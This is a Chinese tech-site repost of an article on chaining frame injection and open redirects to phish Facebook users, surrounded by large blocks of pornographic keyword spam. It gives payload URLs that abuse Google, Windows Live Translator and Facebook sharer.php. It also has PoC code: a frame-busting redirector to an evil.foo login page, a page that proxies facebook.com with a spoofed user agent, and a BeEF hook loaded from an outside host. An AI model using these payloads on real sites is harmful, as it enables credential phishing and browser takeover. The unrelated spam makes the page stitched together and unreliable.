精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

從框架注入漏洞到非法重定向

安全 應(yīng)用安全
一個(gè)框架注入攻擊是一個(gè)所有基于GUI的瀏覽器攻擊,它包括任何代碼如JavaScript,VBScript(ActivX),Flash,AJAX(html+js+py)。代碼被注入是由于腳本沒有對它們正確驗(yàn)證。

一、框架注入漏洞的定義,描述:

定義:

一個(gè)框架注入攻擊是一個(gè)所有基于GUI的瀏覽器攻擊,它包括任何代碼如JavaScript,VBScript(ActivX),Flash,AJAX(html+js+py)。代碼被注入是由于腳本沒有對它們正確驗(yàn)證。

框架弱點(diǎn)的注入攻擊,盡管有些人可能會(huì)認(rèn)為它們與HTML注入/跨站腳本是同類,我在此告訴你:“它們是不一樣的。”

這是為什么:

* 沒有必要注入特殊控制字符,如尖括號(hào)(HTMLi/XSS)

* HTMLi/XSS 過濾慣常的程序不會(huì)對項(xiàng)目內(nèi)注入,因?yàn)槲覀冎恍枰迦胍粋€(gè)URL中的非審查的參數(shù)。

最好的解釋方法就是舉一個(gè)例子。大多數(shù)框架注入的問題都發(fā)生在Web應(yīng)用程序中,因?yàn)閯?dòng)態(tài)框架/iframe中沒有足夠的實(shí)施過濾。例如, 我們的目標(biāo)有以下網(wǎng)址:

https://www.***.com /index.php?targeturl=/contact.php

我們的意圖是要發(fā)動(dòng)釣魚攻擊篡改的targeturl參數(shù)。我們的目標(biāo)是是插入第三方網(wǎng)頁,根據(jù)我們的控制,而不是原來的聯(lián)系網(wǎng)頁:

https://www.victim.foo/index.php?targeturl=http://evil.foo/login.php

注:我們可以編碼惡意pishing鏈接到十六進(jìn)制值,在此文章內(nèi)我們沒有使用。

二、針對網(wǎng)址作為有效載荷的描述:

這種技術(shù)只工作在受害者已將您加入他的朋友清單內(nèi),如果Facebook的cookie數(shù)據(jù)儲(chǔ)存在瀏覽器中,合法的框架注入對Facebook的組成輸入一個(gè)url上的網(wǎng)頁并命名為sharer.php。在Facebook中你將會(huì)看到,如果聯(lián)系人在線或不接受時(shí),他的朋友或如果他的個(gè)人資料是公開的。黑客將嘗試添加您并獲得關(guān)于您的信息。在Facebook會(huì)建議您不要讓每一個(gè)不被信任的聯(lián)系人加入您,因?yàn)樗梢試L試破解你的帳戶,如發(fā)生給你一個(gè)惡意鏈接。

這種攻擊如何工作?

這兒是一個(gè)小的代碼,可以使用Facebook保護(hù)“合法”鏈接注入facebook.com/sharer.php。

/--------------------------------------\ /------\

|http:// | |share |

\--------------------------------------/ \------/

使用Google或Live搜索框注入作為有效載荷的攻擊:

現(xiàn)在可以使用我們的惡意智能劫持這個(gè)。

“合法”框架注入,我們將使用一個(gè)值得“信賴”的網(wǎng)站,bypass.php源代碼是我們的惡意重定向腳本,這將是解釋下面的內(nèi)容。

The source code of bypass.php is my malicious redirector script, it will be explained later in the paper.

Google圖像框架注入

http://www.google.fr/imgres?imgurl=http://fake_url&imgrefurl=http://evil.foo/bypass.php

Windows live 翻譯框架注入

http://www.windowslivetranslator.com/BV.aspx?ref=Internal#http://www.windowslivetranslator.com/bv.aspx?mkt=fr-FR&dl=fr&lp=en_fr&a=http://evil.foo/bypass.php

三、重定向描述 :

重定向漏洞允許一個(gè)邪惡的用戶對一個(gè)網(wǎng)站重定向給受害者。主要攻擊媒介的這種脆弱性是pishing。只有在遠(yuǎn)程Web服務(wù)器的權(quán)限可以重定向漏洞使用惡意腳本php,javascript, vbscript ,ajax (worm)。

最常見的攻擊媒介是體現(xiàn)在雙重網(wǎng)址中:

http://site.com/redirect?r=http://malicious_website.com

四、利用方式,結(jié)合重定向框架注入vulnz:

先進(jìn)的重定向和框架注入組合攻擊:

/-----------/ /-----------/ /-----------/ /-----------/ /-----------/

|facebook ---| google ---| bypass.php|---| login.php ---| b e e f :

\-----------\ \-----------\ \-----------\ \-----------\ \-----------\

Facebook的sharer.php的輸入源可能看起來像這樣的腳本:

#########################################################################

<!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN"

"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<title> Welcome in my-site-is-not-secure-now.w00t</title>

</head>

<frameset rows="*" cols="110,*" frameborder="NO" border="0" framespacing="0">

<frame src="navigation.htm" name="navigation" frameborder="yes" scrolling=""NO"

bordercolor="#0000CC" id="navigation">

<frameset rows="98,*" cols="*" framespacing="0" frameborder="NO" border="0" >

<frame src="en_tete.htm" name="en-tete" frameborder="yes" scrolling="NO"

bordercolor="#000000" id="en-tete">

<frame src="<?php

//secure code

if(isset($_GET['iframe']))

{

$allowUrls = array("http://www.google.fr/imgres?imgurl=http://fake_url&imgrefurl=http://evil.foo/bypass.php");

if(in_array($_GET['iframe'], $allowUrls))

echo $_GET['iframe']; // 如果IFRAME中允許有一個(gè)網(wǎng)址

else // 為了顯示主頁(或一個(gè)錯(cuò)誤頁面)

echo "accueil.htm";

}

else // !!!

echo "accueil.htm";

?>" name="corps" scrolling="auto" id="corps">

</frameset>

</frameset><noframes>No frames :(</noframes>

</html>

#########################################################################

在Facebook中變換惡意網(wǎng)址鏈接像這樣(sharer.php script):

http://www.facebook.com/ext/share.php?sid=501337&h=Crew&u=p3lo

和上面的鏈接Facebook的概況出現(xiàn)像這樣:

&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&

圖片搜索結(jié)果

http://www.google.fr/imgres?imgurl=http://fake_url...

&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&

現(xiàn)在來看看我的成批輸出轉(zhuǎn)換程序(PoC)重定向腳本(bypass.php):

###########################################################################

<head>

<meta http-equiv="Content-Language" content="it">

<SCRIPT LANGUAGE="JavaScript">

if (top.frames.length!=0) top.location=self.document.location;

</SCRIPT>

<title>fb redirector PoC by Czy</title>

</head>

<body bgcolor="#99FF66">

第一個(gè)腳本包含在head,允許殺死第一個(gè)框架的有效載荷,URL重定向到self.document.location。

第二個(gè)腳本允許重定向我的網(wǎng)頁上,以先進(jìn)的pishing頁面。

<br>

<br><br>

</body>

<br><br><script>document.location="http://evil.foo/login.php";</script><br>

###############################################################################

這是先進(jìn)重定向pishing頁面的來源 (login.php):

###############################################################################

<?php

//by Czy

$referer=”http://www.facebook.com/”;

// spoofing FireFox 2.0

$useragent=”Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1?;

$ch = curl_init();

curl_setopt ($ch, CURLOPT_URL, "http://www.facebook.com/");

curl_setopt ($ch, CURLOPT_HEADER, 0);

curl_setopt($ch, CURLOPT_USERAGENT, $useragent);

curl_setopt($ch, CURLOPT_REFERER, $referer);

curl_exec ($ch);

curl_close ($ch);

?>

<script src=”http://beefsite/beef/hook/beefmagic.js.php”></script>

###############################################################################

五、尾聲:

經(jīng)過長期時(shí)刻的研究,我認(rèn)為最好的方式來糾正這些漏洞是保證用戶離開該網(wǎng)頁和網(wǎng)站域名的重定向頁面。

責(zé)任編輯:藍(lán)雨淚 來源: 紅黑聯(lián)盟
相關(guān)推薦

2017-01-04 13:42:35

MINIFILTER文件重定向源碼

2010-12-14 15:07:15

ICMP路由重定向

2020-11-18 09:29:06

NginxHTTPHTTPS

2012-11-05 10:01:18

Chrome

2011-08-02 09:35:03

Chrome瀏覽器重定向

2023-08-07 10:17:20

AI域名ChatGPT

2020-12-09 11:10:12

shellLinux管道

2020-07-27 07:41:23

Linux重定向數(shù)據(jù)流

2010-12-31 13:35:25

文件夾重定向

2020-10-14 09:44:52

漏洞

2013-04-19 10:56:54

2022-11-17 08:40:14

Linux輸出錯(cuò)誤重定向

2020-09-29 10:44:51

漏洞

2017-01-19 19:14:20

Linux重定向命令

2010-03-09 16:11:59

Linux重定向

2010-04-20 15:25:12

Unix操作系統(tǒng)

2010-05-04 14:42:33

Unix操作系統(tǒng)

2009-12-25 16:21:41

shell命令

2011-06-15 14:33:13

2009-11-23 18:39:17

PHP重定向
點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)

亚洲日本在线a| 天堂蜜桃一区二区三区| 日韩欧美激情在线| 欧美日韩黄色一级片| 国产三级在线免费| 国产一区二区三区免费看| 欧美精品videossex88| 加勒比综合在线| 欧美高清hd| 色8久久精品久久久久久蜜| 一区二区欧美日韩| 婷婷丁香花五月天| 久久狠狠亚洲综合| 欧美在线一区二区视频| 国产精品精品软件男同| 亚洲v天堂v手机在线| 91精品在线免费| 国产精品69久久久| 欧美被日视频| 久久久久国产免费免费| 国产成人精品自拍| 国产一区二区在线视频观看| 日韩视频一区| 欧美精品一区在线播放| 国产成人一区二区在线观看| 精品国产18久久久久久洗澡| 91精品国产综合久久精品| 国产精品99久久免费黑人人妻| 在线欧美三级| 亚洲色图.com| 午夜精品一区二区三区四区| 神马久久久久| av不卡免费电影| 高清视频一区二区三区| 一卡二卡在线观看| 日韩精品成人一区二区三区| 午夜精品一区二区三区在线视| 成人高潮免费视频| 日韩成人影院| 一区二区亚洲精品国产| 在线天堂www在线国语对白| 1313精品午夜理伦电影| 欧美一区二区三区在| 久久国产这里只有精品| 亚洲第一二三四区| 色婷婷综合久色| 国产精品无码av在线播放| 大菠萝精品导航| 亚洲成人av电影在线| 国产一线二线三线女| 污污视频在线| 亚洲一区二区三区视频在线播放| 男女激烈动态图| 精品视频在线一区二区| 自拍偷拍欧美精品| 老司机午夜网站| 国精产品一区| 一区二区三区小说| 成人短视频在线观看免费| 免费不卡av| 午夜精品一区二区三区免费视频 | 亚洲午夜一区二区| 黄色成人在线免费观看| www在线看| 福利微拍一区二区| 中文字幕第21页| 黄色欧美视频| 日韩一区二区麻豆国产| 在线播放av网址| 亚洲成aⅴ人片久久青草影院| 亚洲视频在线看| 国产福利在线导航| 欧美激情日韩| 91av在线影院| 中文字幕在线2018| 国产乱子伦视频一区二区三区| 91在线看网站| 日本福利在线观看| 国产精品久久99| 中文精品无码中文字幕无码专区| 91丝袜在线| 在线观看一区不卡| 国产精品久久久久久久99| 国产伦精品一区二区三区在线播放| 亚洲第一视频网站| 亚洲无人区码一码二码三码的含义| 久久免费大视频| 欧美日韩第一页| 日韩精品一区不卡| 国产在线播放一区| 久久riav| 久久黄色美女电影| 欧美日韩中文字幕在线视频| 国产精品一区二区小说| 国产精品一区二区中文字幕| 一个色综合导航| 欧美毛片在线观看| 视频一区国产视频| 国产a一区二区| 在线视频婷婷| 欧美日韩国产精品一区二区不卡中文| 亚洲免费一级视频| 欧美综合自拍| 不卡av在线播放| 无码任你躁久久久久久久| 国产成人午夜视频| 亚洲免费精品视频| 性爽视频在线| 337p日本欧洲亚洲大胆色噜噜| 亚洲一级片在线播放| 亚洲精品1区2区| 亚洲xxx大片| aaa在线免费观看| 黄色成人av网| 成年女人免费视频| 亚洲激情中文| 国产日韩精品在线观看| 美女毛片在线看| 亚洲第一搞黄网站| 免费网站在线观看黄| 国产在线日韩精品| 97免费视频在线| 午夜久久久久久久久久| 中文字幕+乱码+中文字幕一区| 天天夜碰日日摸日日澡性色av| 国产精品美女久久久久| 中文字幕一精品亚洲无线一区| 天天爽夜夜爽夜夜爽精品| 国产精品91xxx| 手机福利在线视频| 粉嫩91精品久久久久久久99蜜桃 | 国产白嫩美女无套久久| 欧美一区亚洲| 亚洲精品免费网站| 97caopor国产在线视频| 欧美一级日韩免费不卡| 一级免费黄色录像| 麻豆成人av在线| 亚洲欧美国产一区二区| 国精品产品一区| 中文亚洲视频在线| 中文字幕有码视频| 亚洲欧洲成人精品av97| 亚洲视频第二页| 国产精品久久观看| 成人中心免费视频| 成人福利网站| 精品日本一线二线三线不卡| 久久久久亚洲AV成人| 国产精品1024久久| 免费观看亚洲视频| 久久亚洲精精品中文字幕| 久久精品成人动漫| 国产xxxx在线观看| 一区二区成人在线视频| 日本少妇xxxx软件| 在线精品一区| 久久伦理网站| 成人精品国产亚洲| 久久精品国产欧美激情| 国产高清在线免费| 亚洲妇女屁股眼交7| 一级特黄a大片免费| 久久一区二区三区超碰国产精品| 欧美日韩亚洲一区二区三区在线观看| 欧美成人ⅴideosxxxxx| 中文国产成人精品| 国产模特av私拍大尺度| 亚洲精品精品亚洲| 国产麻豆剧传媒精品国产av| 性娇小13――14欧美| 亚洲精品成人自拍| 国产精久久久| 97久久精品人人澡人人爽缅北| 韩国三级在线观看久| 欧美日韩精品系列| 久久精品www| 91麻豆国产精品久久| 九九视频精品在线观看| 天天综合国产| 国外成人在线视频网站| 希岛爱理一区二区三区av高清| 最近日韩中文字幕中文| 精品久久久无码中文字幕| 亚洲成在线观看| 日韩影视一区二区三区| 国产精品综合一区二区三区| 97精品视频在线观看| 精品久久精品久久| 国产一二在线观看| 777xxx欧美| 伊人久久综合视频| 国产欧美精品日韩区二区麻豆天美| 超碰在线公开97| 欧美日一区二区三区在线观看国产免| 国产在线精品一区二区三区》| 午夜影视一区二区三区| 久久精品国产清自在天天线| 人人妻人人澡人人爽人人欧美一区| 欧美日韩在线看| 青青操在线视频观看| 成人动漫av在线| 亚洲免费一级视频| 日韩午夜精品| 免费国产成人看片在线| 国产精品欧美三级在线观看| 91精品久久香蕉国产线看观看 | 6080yy精品一区二区三区| se在线电影| 亚洲成av人影院在线观看| 一区二区小视频| 岛国视频午夜一区免费在线观看| 战狼4完整免费观看在线播放版| 99在线精品免费| 亚洲天堂av一区二区三区| 久久精品综合| 分分操这里只有精品| 国产大片一区| 欧美一二三区| 成人h动漫免费观看网站| 91精品免费看| 美脚恋feet久草欧美| 国色天香2019中文字幕在线观看| 在线激情免费视频| 亚洲欧美日韩中文在线| 蜜臀av在线观看| 日韩一区和二区| 一级黄色短视频| 欧美自拍丝袜亚洲| 91精品国产综合久久久蜜臀九色| 亚洲黄色小视频| av成人免费网站| 国产精品女同互慰在线看| 免费在线观看污| 久久伊人蜜桃av一区二区| 成年人的黄色片| 成人精品视频一区二区三区尤物| 视频区 图片区 小说区| 蜜臀av亚洲一区中文字幕| 国产一区二区视频免费在线观看| 亚洲另类自拍| ww国产内射精品后入国产| 亚洲国产日本| 欧美亚洲黄色片| 欧美午夜a级限制福利片| 亚洲av首页在线| 欧美aⅴ99久久黑人专区| 五月天在线免费视频| 欧美在线1区| 奇米777四色影视在线看| 欧美欧美全黄| 无码日本精品xxxxxxxxx| 欧美一区在线看| avav在线播放| 国产综合色产| 欧美激情视频免费看| 99精品99| 那种视频在线观看| 爽好多水快深点欧美视频| 女人另类性混交zo| 美女精品自拍一二三四| 自拍偷拍一区二区三区四区| 捆绑调教美女网站视频一区| 五月天激情播播| 国产精品自在在线| 欧美xxxxx精品| 久久只精品国产| 欧日韩不卡视频| 自拍偷自拍亚洲精品播放| 久久免费公开视频| 狠狠综合久久av一区二区小说| 久久久精品毛片| 欧美精品日韩一本| 日本黄色三级视频| 亚洲区免费影片| 免费网站成人| 性色av一区二区三区免费 | 欧美日本一区| 欧美精品99久久| 热久久免费视频| 免费欧美一级片| 91亚洲午夜精品久久久久久| 亚洲欧洲久久久| 亚洲色欲色欲www| 日本三级中文字幕| 欧美三级电影网| 亚洲第一黄色片| 国产性猛交xxxx免费看久久| 怡红院在线播放| 国产成人精品久久二区二区91| 成人亚洲精品| 精品蜜桃一区二区三区| 色综合咪咪久久网| 免费观看美女裸体网站| 久久99精品久久久久久动态图| 日本精品一二三| 日本一二三四高清不卡| 久久久国产成人| 色丁香久综合在线久综合在线观看| 国产毛片在线视频| 亚洲人在线视频| 黄视频在线免费看| 国产免费久久av| 亚洲+小说+欧美+激情+另类| 黄色污污在线观看| 日韩在线观看一区二区| 久久性爱视频网站| 综合在线观看色| 欧美brazzers| 亚洲国产古装精品网站| 免费大片黄在线观看视频网站| 2019中文在线观看| 精品国产一区二| 五月天久久狠狠| 亚洲综合精品| 精品国产乱码久久久久夜深人妻| 国产日韩欧美精品一区| 国产第一页在线播放| 欧美久久久久久久久中文字幕| 免费一级毛片在线观看| 欧美国产在线电影| 少妇高潮一区二区三区99| 日产中文字幕在线精品一区| 在线免费高清一区二区三区| 在线免费看v片| 国产精品白丝在线| 中文字幕一区二区三区四区欧美| 亚洲国产精品va在线观看黑人| av片在线观看| 91久久综合亚洲鲁鲁五月天| 欧美色图激情小说| 日韩在线第三页| 久久久影院官网| 五月天婷婷久久| 精品成人一区二区三区| 欧美人与牲禽动交com| 亚洲mm色国产网站| 亚洲人metart人体| 久久精品国产露脸对白| 国产精品久99| 亚洲一卡二卡在线观看| 中文字幕日韩欧美| 久久久成人av毛片免费观看| 免费观看国产成人| 久久不射2019中文字幕| 黄色在线观看av| 欧美日韩一区二区在线播放| 欧洲毛片在线| 日本在线观看天堂男亚洲| 亚洲精品国模| 成年人在线看片| 中文一区二区完整视频在线观看| 波多野结衣不卡| 色播久久人人爽人人爽人人片视av| 狠狠久久综合| 国产日韩欧美大片| 夫妻av一区二区| 在线能看的av| 在线观看视频99| 精品久久国产一区| 大陆av在线播放| 91理论电影在线观看| 天天爱天天做天天爽| 中文字幕久热精品在线视频| 日韩专区视频| 男人的天堂avav| 久久免费偷拍视频| 亚洲天堂男人网| 欧美国产视频日韩| 五月国产精品| 午夜国产一区二区三区| 亚洲美女偷拍久久| 天堂在线资源库| 国产精品mp4| 亚洲精品成人影院| 日韩综合第一页| 色婷婷久久久久swag精品| 日韩三级影院| 古典武侠综合av第一页| 狂野欧美性猛交xxxx巴西| 99久久99久久精品免费| 日韩欧美不卡一区| 无遮挡爽大片在线观看视频 | 日本久久精品电影| 黄色在线论坛| 久草精品电影| 老司机午夜精品| 国产成人无码精品| 日韩在线视频国产| 国产精品tv| 国产精品v日韩精品v在线观看| 亚洲一区二区五区| 91福利在线视频| 国产亚洲福利社区| 老司机免费视频一区二区三区| 日韩精品久久久久久久| 久久精品99无色码中文字幕| 日韩免费电影在线观看| 在线不卡一区二区三区| 欧美日韩另类字幕中文|